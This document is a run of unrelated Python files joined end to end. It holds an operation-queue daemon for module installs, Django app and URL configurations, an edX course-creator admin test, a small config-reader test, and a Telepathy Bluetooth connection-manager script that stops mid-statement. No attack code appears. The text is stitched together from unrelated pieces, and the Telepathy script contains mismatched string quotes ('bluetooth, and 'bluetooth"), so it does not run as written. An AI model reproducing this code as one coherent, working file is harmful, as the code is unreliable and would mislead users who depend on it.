        lockfile = open(configuration.get_entry("core.webpath")+"/scv_operating.lck","w")
        lockfile.close()
        stmnt_lock = "UPDATE OPERATIONS SET OPE_STATUS = 1 \
                            WHERE OPE_ID IN ( \
                              SELECT OPE_ID FROM OPERATIONS \
                              WHERE OPE_OPE_PARENT IS NULL AND OPE_STATUS = 0 \
                              AND OPE_INVOKED = ( \
                                SELECT MIN(OPE_INVOKED) FROM OPERATIONS  \
                                WHERE OPE_OPE_PARENT IS NULL AND OPE_STATUS = 0) \
                            ) ;"
        stmnt = "SELECT OPE_ID, OPE_TYPE FROM OPERATIONS WHERE OPE_OPE_PARENT IS NULL AND OPE_STATUS = 1 ;"
        db.query(stmnt_lock,commit=True)
        cur = db.query(stmnt)
        res = cur.fetchallmap()
        if len(res) > 0:
            operation = cls.restore_operation(res[0])
            try:
                cls.process_children(operation)
                operation.do_workload()
            except Exception, e:
                stmnt_err = "UPDATE OPERATIONS SET OPE_STATUS = 2 WHERE OPE_ID = ? ;"
                db.query(stmnt_err,(operation.get_id(),),commit=True)
                error = StringIO()
                print_exc(None,error)
                Core().log(error.getvalue())
            ret = True
        else:
            ret = False
        stmnt_delete = "DELETE FROM OPERATIONS WHERE OPE_STATUS = 1 ;"
        db.query(stmnt_delete,commit=True)
        db.commit()
        try:
            os.unlink(configuration.get_entry("core.webpath")+"/scv_operating.lck")
        except OSError,e :
            raise OperationException(OperationException.get_msg(0))
        return ret

    @classmethod
    def get_current_operations_for_gui(cls, operation_types=None):
        """
        Returns all Operations in an associative array.
        The array's indices are the operationIDs
        The Objects contain all information about the operations,
        including the Data
        """
        db = Database()
        #TODO CHECK HOW LISTS ARE HANDLED IN FDB
        if operation_types is not None and type(operation_types) == list:
            stmnt = "SELECT OPE_ID, OPE_OPE_PARENT, OPE_INVOKED, OPE_TYPE, OPE_STATUS FROM OPERATIONS WHERE OPE_TYPE IN (?) ORDER BY OPE_INVOKED ;"
            cur = db.query(stmnt,(operation_types))
        else:
            stmnt = "SELECT OPE_ID, OPE_OPE_PARENT, OPE_INVOKED, OPE_TYPE, OPE_STATUS FROM OPERATIONS ORDER BY OPE_INVOKED ;"
            cur = db.query(stmnt)
        ret = {}
        for row in cur.fetchallmap():
            operation = cls.restore_operation(row)
            custom_values = operation.get_values()

            ret[row["OPE_ID"]] = {"id":row["OPE_ID"],
                                  "parent":row["OPE_OPE_PARENT"],
                                  "invoked":str(row["OPE_INVOKED"]),
                                  "type":row["OPE_TYPE"],
                                  "status":row["OPE_STATUS"],
                                  "data":custom_values}
        return ret

    def get_values(self):
        """
        trivial
        """
        return self._values

    def get_value(self,key):
        """
        trivial
        """
        return self._values(key)

    def set_value(self,key,value):
        """
        trivial
        """
        self._values[key] = value

    def set_parent(self,parent_id):
        """
        trivial
        """
        self._parent = parent_id

    def get_parent(self):
        """
        trivial
        """
        return self._parent

    def set_db_id(self):
        """
        Get a new Operation Id from the Database and assign it to this
        Operation if this Operation's id is null. Afterwards return the 
        new Id
        """
        if self._id is None:
            self._id = Database().get_seq_next('OPE_GEN')
        return self._id

    def set_id(self, nr):
        """
        trivial
        """
        self._id = nr

    def get_id(self):
        """
        trivial
        """
        return self._id

    def store(self):
        """
        Stores this Operation to database.
        Also saves every user defined value in $_values as 
        long as it is a valid type         
        """
        db = Database()

        self.set_db_id()

        stmnt = "UPDATE OR INSERT INTO OPERATIONS (OPE_ID, OPE_OPE_PARENT, OPE_INVOKED, OPE_TYPE) \
                      VALUES (?,?,CURRENT_TIMESTAMP,?) MATCHING (OPE_ID);"
        db.query(stmnt,(self._id,self._parent,self.__class__.__name__),commit=True)

        stmnt = "UPDATE OR INSERT INTO OPERATIONDATA (OPD_OPE_ID, OPD_KEY, OPD_VALUE, OPD_TYPE) \
                      VALUES ( ?, ?, ?, ?) MATCHING(OPD_OPE_ID,OPD_KEY);"
        for key, value in self._values.items():
            typ = str(type(value)).replace("<type '","",1).replace("'>","",1)
            if typ not in Operation.VALID_STORAGE_TYPES:
                continue
            db.query(stmnt,(self._id,key,value,typ),commit=True)

    def do_workload(self):
        """
        This method must be overridden by inheriting classes.
        The code inside this method will be executed when the
        Operation is processed by Operation.processNext or 
        Operation.processChild 
        """
        pass

#MODULEINVOLVED
class ModuleOperation(Operation):
    """
    Abstracts Operations that have to do with modules
    """
    def __init__(self):
        """
        trivial
        """
        Operation.__init__(self)

    def set_values(self,module):
        """
        Sets this operations values from module metadata
        """
        if type(module) == dict:
            self.set_value("name",module["name"])
            self.set_value("hrname",module["hrname"])
            self.set_value("version_major",module["version_major"])
            self.set_value("version_minor",module["version_minor"])
            self.set_value("revision",module["revision"])
            if module.has_key("signature"):
                self.set_value("signature",module["signature"])
        elif module.__class__.__name__ == "Module":
            pass #TODO IMPLEMENT / DISCUSS AFTER IMPLEMENTING MODULE-SUBSYSTEM

    def get_meta(self):
        """
        trivial
        """
        return self._values
    
    @classmethod
    def get_currently_processed_modules(cls):
        """
        Returns an Array of ModuleOperation-Objects that are
        currently listedin the queue 
        """
        db = Database()
        stmnt = "SELECT OPE_ID, OPE_OPE_PARENT, OPE_TYPE FROM OPERATIONS \
                   WHERE OPE_TYPE = 'ModuleInstallOperation' \
                   or OPE_TYPE = 'ModuleUninstallOperation' ;"
        cur = db.query(stmnt);
        ret = []
        for row in cur.fetchallmap():
            ret.append(Operation.restore_operation(row).get_meta())
        return ret

    def optimize_queue(self):
        """
        abtract
        """
        pass

#MODULEINVOLVED
class ModuleInstallOperation(ModuleOperation):
    """
    Manages the process to install a module to this server
    """
    def __init__(self):
        """
        trivial
        """
        ModuleOperation.__init__(self)

    def do_workload(self):
        """
        tell the module manager to install a specific module.
        """
        Module.install_module(self.get_meta())

    def optimize_queue(self):
        """
        optimizes the queue. 
        """
        pass    #TODO Implement

#MODULEINVOLVED
class ModuleUninstallOperation(ModuleOperation):
    """
    Manages the process to uninstall a module to this server
    """
    def __init__(self):
        """
        trivial
        """
        ModuleOperation.__init__(self)

    def do_workload(self):
        """
        tell the module manager to install a specific module.
        """
        module = Module.get_module_by_name(self._values["name"])
        module_manager.uninstall_module(module)

    def optimize_queue(self):
        """
        optimizes the queue. 
        """
        pass    #TODO Implement

#MODULEINVOLVED
class ModuleUpdateOperation(ModuleOperation):
    """
    Manages the process to uninstall a module to this server
    """
    def __init__(self):
        """
        trivial
        """
        ModuleOperation.__init__(self)

    def do_workload(self):
        """
        tell the module manager to install a specific module.
        """
        module = Module.get_module_by_name(self._values["name"])
        module_manager.update_module(module)
        
    def optimize_queue(self):
        """
        optimizes the queue. 
        """
        pass    #TODO Implement

class FailOperation(Operation):
    """
    For unittest purposes: An Operation that always fails
    """
    def __init__(self):
        """
        trivial
        """
        Operation.__init__(self)

    def do_workload(self):
        """
        simply fail
        """
        raise Exception("Failoperation failed")

class TestOperation(Operation):
    """
    For unittest purposes: An Operation that always succeds
    """
    def __init__(self):
        """
        trivial
        """
        Operation.__init__(self)

    def do_workload(self):
        """
        simply succeed
        """
        pass

class OperationDaemon(Daemon):
    """
    This is the deamon that runs to actually execute the scheduled operations
    """
    def __init__(self, pidfile):
        """
        Initialize the deamon
        """
        Daemon.__init__(self,pidfile)

    def stop(self):
        configuration = Configuration()
        if os.path.exists(configuration.get_entry("core.webpath")+"/scv_operating.lck"):
            os.remove(configuration.get_entry("core.webpath")+"/scv_operating.lck") 
        Daemon.stop(self)

    def run(self):
        """
        Do work if there is work to do, otherwise check every two seconds for new work.
        """
        while True:
            while Operation.process_next():
                pass
            sleep(2)


"""
Application file for the code snippets app.
"""

from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _


class SnippetsConfig(AppConfig):
    """
    Application configuration class for the code snippets app.
    """

    name = 'apps.snippets'
    verbose_name = _('Code snippets')

# -*- encoding: utf-8 -*-

from . import res_partner_bank
from . import account_bank_statement_import

"""
Tests course_creators.admin.py.
"""

from django.test import TestCase
from django.contrib.auth.models import User
from django.contrib.admin.sites import AdminSite
from django.http import HttpRequest
import mock

from course_creators.admin import CourseCreatorAdmin
from course_creators.models import CourseCreator
from django.core import mail
from student.roles import CourseCreatorRole
from student import auth


def mock_render_to_string(template_name, context):
    """Return a string that encodes template_name and context"""
    return str((template_name, context))


class CourseCreatorAdminTest(TestCase):
    """
    Tests for course creator admin.
    """

    def setUp(self):
        """ Test case setup """
        super(CourseCreatorAdminTest, self).setUp()
        self.user = User.objects.create_user('test_user', 'test_user+courses@edx.org', 'foo')
        self.table_entry = CourseCreator(user=self.user)
        self.table_entry.save()

        self.admin = User.objects.create_user('Mark', 'admin+courses@edx.org', 'foo')
        self.admin.is_staff = True

        self.request = HttpRequest()
        self.request.user = self.admin

        self.creator_admin = CourseCreatorAdmin(self.table_entry, AdminSite())

        self.studio_request_email = 'mark@marky.mark'
        self.enable_creator_group_patch = {
            "ENABLE_CREATOR_GROUP": True,
            "STUDIO_REQUEST_EMAIL": self.studio_request_email
        }

    @mock.patch('course_creators.admin.render_to_string', mock.Mock(side_effect=mock_render_to_string, autospec=True))
    @mock.patch('django.contrib.auth.models.User.email_user')
    def test_change_status(self, email_user):
        """
        Tests that updates to state impact the creator group maintained in authz.py and that e-mails are sent.
        """

        def change_state_and_verify_email(state, is_creator):
            """ Changes user state, verifies creator status, and verifies e-mail is sent based on transition """
            self._change_state(state)
            self.assertEqual(is_creator, auth.user_has_role(self.user, CourseCreatorRole()))

            context = {'studio_request_email': self.studio_request_email}
            if state == CourseCreator.GRANTED:
                template = 'emails/course_creator_granted.txt'
            elif state == CourseCreator.DENIED:
                template = 'emails/course_creator_denied.txt'
            else:
                template = 'emails/course_creator_revoked.txt'
            email_user.assert_called_with(
                mock_render_to_string('emails/course_creator_subject.txt', context),
                mock_render_to_string(template, context),
                self.studio_request_email
            )

        with mock.patch.dict('django.conf.settings.FEATURES', self.enable_creator_group_patch):

            # User is initially unrequested.
            self.assertFalse(auth.user_has_role(self.user, CourseCreatorRole()))

            change_state_and_verify_email(CourseCreator.GRANTED, True)

            change_state_and_verify_email(CourseCreator.DENIED, False)

            change_state_and_verify_email(CourseCreator.GRANTED, True)

            change_state_and_verify_email(CourseCreator.PENDING, False)

            change_state_and_verify_email(CourseCreator.GRANTED, True)

            change_state_and_verify_email(CourseCreator.UNREQUESTED, False)

            change_state_and_verify_email(CourseCreator.DENIED, False)

    @mock.patch('course_creators.admin.render_to_string', mock.Mock(side_effect=mock_render_to_string, autospec=True))
    def test_mail_admin_on_pending(self):
        """
        Tests that the admin account is notified when a user is in the 'pending' state.
        """

        def check_admin_message_state(state, expect_sent_to_admin, expect_sent_to_user):
            """ Changes user state and verifies e-mail sent to admin address only when pending. """
            mail.outbox = []
            self._change_state(state)

            # If a message is sent to the user about course creator status change, it will be the first
            # message sent. Admin message will follow.
            base_num_emails = 1 if expect_sent_to_user else 0
            if expect_sent_to_admin:
                context = {'user_name': "test_user", 'user_email': u'test_user+courses@edx.org'}
                self.assertEquals(base_num_emails + 1, len(mail.outbox), 'Expected admin message to be sent')
                sent_mail = mail.outbox[base_num_emails]
                self.assertEquals(
                    mock_render_to_string('emails/course_creator_admin_subject.txt', context),
                    sent_mail.subject
                )
                self.assertEquals(
                    mock_render_to_string('emails/course_creator_admin_user_pending.txt', context),
                    sent_mail.body
                )
                self.assertEquals(self.studio_request_email, sent_mail.from_email)
                self.assertEqual([self.studio_request_email], sent_mail.to)
            else:
                self.assertEquals(base_num_emails, len(mail.outbox))

        with mock.patch.dict('django.conf.settings.FEATURES', self.enable_creator_group_patch):
            # E-mail message should be sent to admin only when new state is PENDING, regardless of what
            # previous state was (unless previous state was already PENDING).
            # E-mail message sent to user only on transition into and out of GRANTED state.
            check_admin_message_state(CourseCreator.UNREQUESTED, expect_sent_to_admin=False, expect_sent_to_user=False)
            check_admin_message_state(CourseCreator.PENDING, expect_sent_to_admin=True, expect_sent_to_user=False)
            check_admin_message_state(CourseCreator.GRANTED, expect_sent_to_admin=False, expect_sent_to_user=True)
            check_admin_message_state(CourseCreator.DENIED, expect_sent_to_admin=False, expect_sent_to_user=True)
            check_admin_message_state(CourseCreator.GRANTED, expect_sent_to_admin=False, expect_sent_to_user=True)
            check_admin_message_state(CourseCreator.PENDING, expect_sent_to_admin=True, expect_sent_to_user=True)
            check_admin_message_state(CourseCreator.PENDING, expect_sent_to_admin=False, expect_sent_to_user=False)
            check_admin_message_state(CourseCreator.DENIED, expect_sent_to_admin=False, expect_sent_to_user=True)

    def _change_state(self, state):
        """ Helper method for changing state """
        self.table_entry.state = state
        self.creator_admin.save_model(self.request, self.table_entry, None, True)

    def test_add_permission(self):
        """
        Tests that staff cannot add entries
        """
        self.assertFalse(self.creator_admin.has_add_permission(self.request))

    def test_delete_permission(self):
        """
        Tests that staff cannot delete entries
        """
        self.assertFalse(self.creator_admin.has_delete_permission(self.request))

    def test_change_permission(self):
        """
        Tests that only staff can change entries
        """
        self.assertTrue(self.creator_admin.has_change_permission(self.request))

        self.request.user = self.user
        self.assertFalse(self.creator_admin.has_change_permission(self.request))

import unittest

from app import read_config

class ConfigFileReaderTest(unittest.TestCase):
    def test_read(self):
        config = read_config('config')
        self.assertEqual(config['cmus_host'], 'raspberry')
        self.assertEqual(config['cmus_passwd'], 'PaSsWd')
        self.assertEqual(config['app_host'], 'localhost')
        self.assertEqual(config['app_port'], '8080')

if __name__ == '__main__':
    unittest.main()

from django.conf.urls.defaults import *

import frontend.views as frontend_views
import codewiki.views
import codewiki.viewsuml


from django.contrib.syndication.views import feed as feed_view
from django.views.generic import date_based, list_detail
from django.views.generic.simple import direct_to_template
from django.contrib import admin
import django.contrib.auth.views as auth_views
from django.conf import settings

from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect

from django.contrib import admin
admin.autodiscover()

# Need to move this somewhere more useful and try to make it less hacky but
# seems to be the easiest way unfortunately.
from django.contrib.auth.models import User
User._meta.ordering = ['username']


from frontend.feeds import LatestCodeObjects, LatestCodeObjectsBySearchTerm, LatestCodeObjectsByTag, LatestViewObjects, LatestScraperObjects

feeds = {
    'all_code_objects': LatestCodeObjects,
    'all_scrapers': LatestScraperObjects,
    'all_views':   LatestViewObjects,
    'latest_code_objects_by_search_term': LatestCodeObjectsBySearchTerm,
    'latest_code_objects_by_tag': LatestCodeObjectsByTag,
}


urlpatterns = patterns('',
    url(r'^$', frontend_views.frontpage, name="frontpage"),

    # redirects from old version (would clashes if you happen to have a scraper whose name is list!)
    (r'^scrapers/list/$', lambda request: HttpResponseRedirect(reverse('scraper_list_wiki_type', args=['scraper']))),

    url(r'^', include('codewiki.urls')),
    url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name="logout"),
    url(r'^accounts/', include('registration.urls')),
    url(r'^accounts/resend_activation_email/', frontend_views.resend_activation_email, name="resend_activation_email"),
    url(r'^captcha/', include('captcha.urls')),
    url(r'^attachauth', codewiki.views.attachauth),

    # allows direct viewing of the django tables
    url(r'^admin/', include(admin.site.urls)),

    # favicon
    (r'^favicon\.ico$', 'django.views.generic.simple.redirect_to', {'url': '/media/images/favicon.ico'}),

    # RSS feeds
    url(r'^feeds/(?P<url>.*)/$', 'django.contrib.syndication.views.feed', {'feed_dict': feeds}, name='feeds'),

    # API
    (r'^api/', include('api.urls', namespace='foo', app_name='api')),

    # Status
    url(r'^status/$', codewiki.viewsuml.status, name='status'),

    # Documentation
    (r'^docs/', include('documentation.urls')),

    # Robots.txt
    (r'^robots.txt$', direct_to_template, {'template': 'robots.txt', 'mimetype': 'text/plain'}),

    # pdf cropper technology
    (r'^cropper/', include('cropper.urls')),

    # froth
    (r'^froth/', include('froth.urls')),

    # static media server for the dev sites / local dev
    url(r'^media/(?P<path>.*)$',       'django.views.static.serve', {'document_root': settings.MEDIA_DIR, 'show_indexes':True}),
    url(r'^media-admin/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ADMIN_DIR, 'show_indexes':True}),

    #Rest of the site
    url(r'^', include('frontend.urls')),

    # redirects from old version
    (r'^editor/$', lambda request: HttpResponseRedirect('/scrapers/new/python?template=tutorial_python_trivial')),
    (r'^scrapers/show/(?P<short_name>[\w_\-]+)/(?:data/|map-only/)?$',
                   lambda request, short_name: HttpResponseRedirect(reverse('code_overview', args=['scraper', short_name]))),


)

#!/usr/bin/env python

import sys

import gobject
import dbus.mainloop.glib
dbus.mainloop.glib.DBusGMainLoop(set_as_default = True)

import telepathy


DBUS_PROPERTIES = 'org.freedesktop.DBus.Properties'


def get_registry():
	reg = telepathy.client.ManagerRegistry()
	reg.LoadManagers()
	return reg


def get_connection_manager(reg):
	cm = reg.GetManager('bluewire')
	return cm


class Action(object):

	def __init__(self):
		self._action = None

	def queue_action(self):
		pass

	def append_action(self, action):
		assert self._action is None
		self._action = action

	def get_next_action(self):
		assert self._action is not None
		return self._action

	def _on_done(self):
		if self._action is None:
			return
		self._action.queue_action()

	def _on_error(self, error):
		print error

	def _on_generic_message(self, *args):
		pass


class DummyAction(Action):

	def queue_action(self):
		gobject.idle_add(self._on_done)


class QuitLoop(Action):

	def __init__(self, loop):
		super(QuitLoop, self).__init__()
		self._loop = loop

	def queue_action(self):
		self._loop.quit()


class DisplayParams(Action):

	def __init__(self, cm):
		super(DisplayParams, self).__init__()
		self._cm = cm

	def queue_action(self):
		self._cm[telepathy.interfaces.CONN_MGR_INTERFACE].GetParameters(
			'bluetooth,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, params):
		print "Connection Parameters:"
		for name, flags, signature, default in params:
			print "\t%s (%s)" % (name, signature),

			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_REQUIRED:
				print "required",
			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_REGISTER:
				print "register",
			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_SECRET:
				print "secret",
			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_DBUS_PROPERTY:
				print "dbus-property",
			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_HAS_DEFAULT:
				print "has-default(%s)" % default,

			print ""
		super(DisplayParams, self)._on_done()


class RequestConnection(Action):

	def __init__(self, cm, username, password, forward):
		super(RequestConnection, self).__init__()
		self._cm = cm

		self._conn = None
		self._serviceName = None

		self._username = username
		self._password = password
		self._forward = forward

	@property
	def conn(self):
		return self._conn

	@property
	def serviceName(self):
		return self._serviceName

	def queue_action(self):
		self._cm[telepathy.server.CONNECTION_MANAGER].RequestConnection(
			'bluetooth",
			{
				'account':  self._username,
				'password': self._password,
				'forward':  self._forward,
			},
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, busName, objectPath):
		self._serviceName = busName
		self._conn = telepathy.client.Connection(busName, objectPath)
		super(RequestConnection, self)._on_done()


class Connect(Action):

	def __init__(self, connAction):
		super(Connect, self).__init__()
		self._connAction = connAction

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION].connect_to_signal(
			'StatusChanged',
			self._on_change,
		)
		self._connAction.conn[telepathy.server.CONNECTION].Connect(
			reply_handler = self._on_generic_message,
			error_handler = self._on_error,
		)

	def _on_done(self):
		super(Connect, self)._on_done()

	def _on_change(self, status, reason):
		if status == telepathy.constants.CONNECTION_STATUS_DISCONNECTED:
			print "Disconnected!"
			self._conn = None
		elif status == telepathy.constants.CONNECTION_STATUS_CONNECTED:
			print "Connected"
			self._on_done()
		elif status == telepathy.constants.CONNECTION_STATUS_CONNECTING:
			print "Connecting"
		else:
			print "Status: %r" % status


class SimplePresenceOptions(Action):

	def __init__(self, connAction):
		super(SimplePresenceOptions, self).__init__()
		self._connAction = connAction

	def queue_action(self):
		self._connAction.conn[DBUS_PROPERTIES].Get(
			telepathy.server.CONNECTION_INTERFACE_SIMPLE_PRESENCE,
			'Statuses',
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, statuses):
		print "\tAvailable Statuses"
		for (key, value) in statuses.iteritems():
			print "\t\t - %s" % key
		super(SimplePresenceOptions, self)._on_done()


class NullHandle(object):

	@property
	def handle(self):
		return 0

	@property
	def handles(self):
		return []


class UserHandle(Action):

	def __init__(self, connAction):
		super(UserHandle, self).__init__()
		self._connAction = connAction
		self._handle = None

	@property
	def handle(self):
		return self._handle

	@property
	def handles(self):
		return [self._handle]

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION].GetSelfHandle(
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, handle):
		self._handle = handle
		super(UserHandle, self)._on_done()


class RequestHandle(Action):

	def __init__(self, connAction, handleType, handleNames):
		super(RequestHandle, self).__init__()
		self._connAction = connAction
		self._handle = None
		self._handleType = handleType
		self._handleNames = handleNames

	@property
	def handle(self):
		return self._handle

	@property
	def handles(self):
		return [self._handle]

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION].RequestHandles(
			self._handleType,
			self._handleNames,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, handles):
		self._handle = handles[0]
		super(RequestHandle, self)._on_done()


class RequestChannel(Action):

	def __init__(self, connAction, handleAction, channelType, handleType):
		super(RequestChannel, self).__init__()
		self._connAction = connAction
		self._handleAction = handleAction
		self._channel = None
		self._channelType = channelType
		self._handleType = handleType

	@property
	def channel(self):
		return self._channel

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION].RequestChannel(
			self._channelType,
			self._handleType,
			self._handleAction.handle,
			True,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, channelObjectPath):
		self._channel = telepathy.client.Channel(self._connAction.serviceName, channelObjectPath)
		super(RequestChannel, self)._on_done()


class EnsureChannel(Action):

	def __init__(self, connAction, channelType, handleType, handleId):
		super(EnsureChannel, self).__init__()
		self._connAction = connAction
		self._channel = None
		self._channelType = channelType
		self._handleType = handleType
		self._handleId = handleId
		self._handle = None

	@property
	def channel(self):
		return self._channel

	@property
	def handle(self):
		return self._handle

	@property
	def handles(self):
		return [self._handle]

	def queue_action(self):
		properties = {
			telepathy.server.CHANNEL_INTERFACE+".ChannelType": self._channelType,
			telepathy.server.CHANNEL_INTERFACE+".TargetHandleType": self._handleType,
			telepathy.server.CHANNEL_INTERFACE+".TargetID": self._handleId,
		}
		self._connAction.conn[telepathy.server.CONNECTION_INTERFACE_REQUESTS].EnsureChannel(
			properties,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, yours, channelObjectPath, properties):
		print "Create?", not not yours
		print "Path:", channelObjectPath
		print "Properties:", properties
		self._channel = telepathy.client.Channel(self._connAction.serviceName, channelObjectPath)
		self._handle = properties[telepathy.server.CHANNEL_INTERFACE+".TargetHandle"]
		super(EnsureChannel, self)._on_done()


class CloseChannel(Action):

	def __init__(self, connAction, chanAction):
		super(CloseChannel, self).__init__()
		self._connAction = connAction
		self._chanAction = chanAction
		self._handles = []

	def queue_action(self):
		self._chanAction.channel[telepathy.server.CHANNEL].Close(
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self):
		super(CloseChannel, self)._on_done()


class ContactHandles(Action):

	def __init__(self, connAction, chanAction):
		super(ContactHandles, self).__init__()
		self._connAction = connAction
		self._chanAction = chanAction
		self._handles = []

	@property
	def handles(self):
		return self._handles

	def queue_action(self):
		self._chanAction.channel[DBUS_PROPERTIES].Get(
			telepathy.server.CHANNEL_INTERFACE_GROUP,
			'Members',
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, handles):
		self._handles = list(handles)
		super(ContactHandles, self)._on_done()


class SimplePresenceStatus(Action):

	def __init__(self, connAction, handleAction):
		super(SimplePresenceStatus, self).__init__()
		self._connAction = connAction
		self._handleAction = handleAction

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION_INTERFACE_SIMPLE_PRESENCE].GetPresences(
			self._handleAction.handles,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, aliases):
		print "\tPresences:"
		for hid, (presenceType, presence, presenceMessage) in aliases.iteritems():
			print "\t\t%s:" % hid, presenceType, presence, presenceMessage
		super(SimplePresenceStatus, self)._on_done()


class SetSimplePresence(Action):

	def __init__(self, connAction, status, message):
		super(SetSimplePresence, self).__init__()
		self._connAction = connAction
		self._status = status
		self._message = message

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION_INTERFACE_SIMPLE_PRESENCE].SetPresence(
			self._status,
			self._message,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self):
		super(SetSimplePresence, self)._on_done()


class Aliases(Action):

	def __init__(self, connAction, handleAction):
		super(Aliases, self).__init__()
		self._connAction = connAction
		self._handleAction = handleAction

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION_INTERFACE_ALIASING].RequestAliases(
			self._handleAction.handles,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, aliases):
		print "\tAliases:"
		for h, alias in zip(self._handleAction.handles, aliases):
			print "\t\t", h, alias
		super(Aliases, self)._on_done()


class Call(Action):

	def __init__(self, connAction, chanAction, handleAction):
		super(Call, self).__init__()
		self._connAction = connAction
		self._chanAction = chanAction
		self._handleAction = handleAction

	def queue_action(self):
		self._chanAction.channel[telepathy.server.CHANNEL_TYPE_STREAMED_MEDIA].RequestStreams(
			self._handleAction.handle,
			[telepathy.constants.MEDIA_STREAM_TYPE_AUDIO],
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, handle):
		print "Call started"
		super(Call, self)._on_done()


class SendText(Action):

	def __init__(self, connAction, chanAction, handleAction, messageType, message):
		super(SendText, self).__init__()
		self._connAction = connAction
		self._chanAction = chanAction
		self._handleAction = handleAction
		self._messageType = messageType
		self._message = message

	def queue_action(self):
		self._chanAction.channel[telepathy.server.CHANNEL_TYPE_TEXT].Send(
			self._messageType,
			self._message,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self,):
		print "Message sent"
		super(SendText, self)._on_done()


class Sleep(Action):

	def __init__(self, length):
		super(Sleep, self).__init__()
		self._length = length

	def queue_action(self):
		gobject.timeout_add(self._length, self._on_done)


class Block(Action):

	def __init__(self):
		super(Block, self).__init__()

	def queue_action(self):
		print "Blocking"

	def _on_done(self):
		#super(SendText, self)._on_done()
		pass


class Disconnect(Action):

	def __init__(self, connAction):
		super(Disconnect, self).__init__()
		self._connAction = connAction

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION].Disconnect(
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)


if __name__ == '__main__':
	loop = gobject.MainLoop()

	reg = get_registry()
	cm = get_connection_manager(reg)

	nullHandle = NullHandle()

	dummy = DummyAction()
	firstAction = dummy
	lastAction = dummy

	if True:
		dp = DisplayParams(cm)
		lastAction.append_action(dp)
		lastAction = lastAction.get_next_action()

	if True:
		username = sys.argv[1]
		password = sys.argv[2]
		forward = sys.argv[3]
		reqcon = RequestConnection(cm, username, password, forward)
		lastAction.append_action(reqcon)
		lastAction = lastAction.get_next_action()

		if False:
			reqcon = RequestConnection(cm, username, password, forward)
			lastAction.append_action(reqcon)
			lastAction = lastAction.get_next_action()

		con = Connect(reqcon)
		lastAction.append_action(con)
		lastAction = lastAction.get_next_action()

		if True:
			spo = SimplePresenceOptions(reqcon)
			lastAction.append_action(spo)
			lastAction = lastAction.get_next_action()

		if True:
			uh = UserHandle(reqcon)
			lastAction.append_action(uh)
			lastAction = lastAction.get_next_action()

			ua = Aliases(reqcon, uh)
			lastAction.append_action(ua)
			lastAction = lastAction.get_next_action()

			sps = SimplePresenceStatus(reqcon, uh)
			lastAction.append_action(sps)
			lastAction = lastAction.get_next_action()

			if False:
				setdnd = SetSimplePresence(reqcon, "dnd", "")
				lastAction.append_action(setdnd)
				lastAction = lastAction.get_next_action()

				sps = SimplePresenceStatus(reqcon, uh)
				lastAction.append_action(sps)
				lastAction = lastAction.get_next_action()

				setdnd = SetSimplePresence(reqcon, "available", "")
				lastAction.append_action(setdnd)
				lastAction = lastAction.get_next_action()

				sps = SimplePresenceStatus(reqcon, uh)
				lastAction.append_action(sps)
				lastAction = lastAction.get_next_action()

		if False:
			sl = Sleep(10 * 1000)
			lastAction.append_action(sl)
			lastAction = lastAction.get_next_action()

		if False:
			rclh = RequestHandle(reqcon, telepathy.HANDLE_TYPE_LIST, ["subscribe"])
			lastAction.append_action(rclh)
			lastAction = lastAction.get_next_action()

			rclc = RequestChannel(
				reqcon,
				rclh,
				telepathy.CHANNEL_TYPE_CONTACT_LIST,
				telepathy.HANDLE_TYPE_LIST,
			)
			lastAction.append_action(rclc)
			lastAction = lastAction.get_next_action()

			ch = ContactHandles(reqcon, rclc)
			lastAction.append_action(ch)
			lastAction = lastAction.get_next_action()

			ca = Aliases(reqcon, ch)
			lastAction.append_action(ca)
			lastAction = lastAction.get_next_action()

		if True:
			accountNumber = sys.argv[4]
			enChan = EnsureChannel(reqcon, telepathy.CHANNEL_TYPE_TEXT, telepathy.HANDLE_TYPE_CONTACT, accountNumber)
			lastAction.append_action(enChan)
			lastAction = lastAction.get_next_action()

			sendDebugtext = SendText(reqcon, enChan, enChan, telepathy.CHANNEL_TEXT_MESSAGE_TYPE_NORMAL, "Boo!")
			lastAction.append_action(sendDebugtext)
			lastAction = lastAction.get_next_action()

		if False:
			rch = RequestHandle(reqcon, telepathy.HANDLE_TYPE_CONTACT, ["18005558355"]) #(1-800-555-TELL)
			lastAction.append_action(rch)
			lastAction = lastAction.get_next_action()

			# making a phone call
			if True:
				smHandle = rch
				smHandleType = telepathy.HANDLE_TYPE_CONTACT
			else:
				smHandle = nullHandle
				smHandleType = telepathy.HANDLE_TYPE_NONE
			rsmc = RequestChannel(
				reqcon,
				smHandle,
